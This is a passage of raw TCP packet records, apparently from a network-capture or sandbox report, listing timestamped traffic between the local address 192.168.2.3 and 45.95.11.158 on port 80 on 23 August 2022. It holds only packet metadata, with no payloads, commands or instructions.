Aug 23, 2022 03:42:55.138772964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138788939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138803959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138827085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138830900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138869047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138891935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138900042 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138925076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138941050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138967037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138978958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138989925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139022112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139028072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139050961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139074087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139105082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139278889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139375925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139381886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139424086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139452934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139453888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139493942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139509916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139533043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139534950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139542103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139574051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139584064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139602900 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139626980 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139655113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139693975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139734983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139749050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139774084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139782906 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139801025 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139821053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139842987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139849901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139882088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139889956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139921904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139935017 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139954090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.139971972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.139991999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140007019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140034914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140043020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140074968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140089035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140104055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140132904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140144110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140155077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140183926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140189886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140223026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140233994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140253067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140270948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140307903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140475988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140516043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140537977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140556097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140575886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140584946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140603065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140635014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140659094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140700102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140711069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140738964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140759945 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140768051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140789032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140820026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140883923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140923977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140938044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140964031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.140980005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.140993118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.141017914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.141052008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.163600922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.163666010 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.163697004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.163727045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.163767099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.163806915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.163845062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.163852930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.163885117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.163908958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.163925886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.163939953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.163959026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.163980007 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.164015055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.164570093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.164612055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.164664030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.164666891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.164683104 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.164696932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.164730072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.164751053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.164952993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.164999962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.165045023 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.165045023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.165061951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.165076017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.165107965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.165119886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169445038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169492006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169529915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169559002 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169575930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169599056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169603109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169637918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169646025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169673920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169677973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169702053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169706106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169733047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169749022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169766903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169790983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169801950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169828892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169847965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169859886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169884920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169899940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169914961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169939041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169955015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.169981003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.169994116 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170012951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170039892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170078993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170084953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170120001 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170136929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170176029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170180082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170211077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170238018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170269012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170300961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170341969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170357943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170416117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170418024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170444965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170476913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170485020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170490980 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170542955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170543909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170583010 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170602083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170634031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170803070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170844078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170886040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170890093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170908928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170923948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170933962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.170953989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.170983076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171014071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171015024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171056986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171070099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171096087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171118021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171125889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171164989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171165943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171174049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171205044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171221972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171245098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171261072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171273947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171298981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171319008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171895027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171937943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171971083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.171977997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.171989918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.172020912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.172030926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.172061920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.172075033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.172103882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.172116041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.172156096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.172830105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.172914028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.172956944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.172964096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.172990084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.173011065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.173023939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.173033953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.173043966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.173074961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.173091888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.173118114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.173131943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.173146009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.173171043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.173186064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.173212051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.173226118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.173229933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.173279047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.173309088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.173346996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.173371077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.173398018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175004959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175055027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175077915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175096035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175117970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175137997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175158978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175179958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175189018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175220966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175235987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175261974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175292015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175304890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175335884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175343990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175376892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175414085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175415993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175457954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175467014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175510883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175524950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175534964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175549984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175551891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175576925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175605059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175616980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175623894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175653934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175666094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175695896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175707102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175731897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.175748110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175781012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.175968885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.176227093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.790545940 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.824837923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.913690090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.913711071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.913727045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.913739920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.913821936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.913861990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.913959980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.913978100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.913995981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.914010048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.914019108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.914087057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.914120913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.914169073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.914202929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.914220095 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.914235115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.914246082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.914273024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.914283037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.945565939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.945631981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.945758104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.945768118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.945787907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.945807934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.945813894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.945826054 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.945836067 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.945868969 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.945952892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.945997953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.946017027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.946027040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.946064949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.946072102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.947617054 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.947657108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.947699070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.947706938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.947734118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.947740078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.947741032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.947812080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.947829008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.947851896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.947858095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.947890997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.947900057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.947932959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.947961092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.947968960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.947973967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.948012114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.948019028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.948052883 CEST	80	49774	45.95.11.158	192.168.2.3
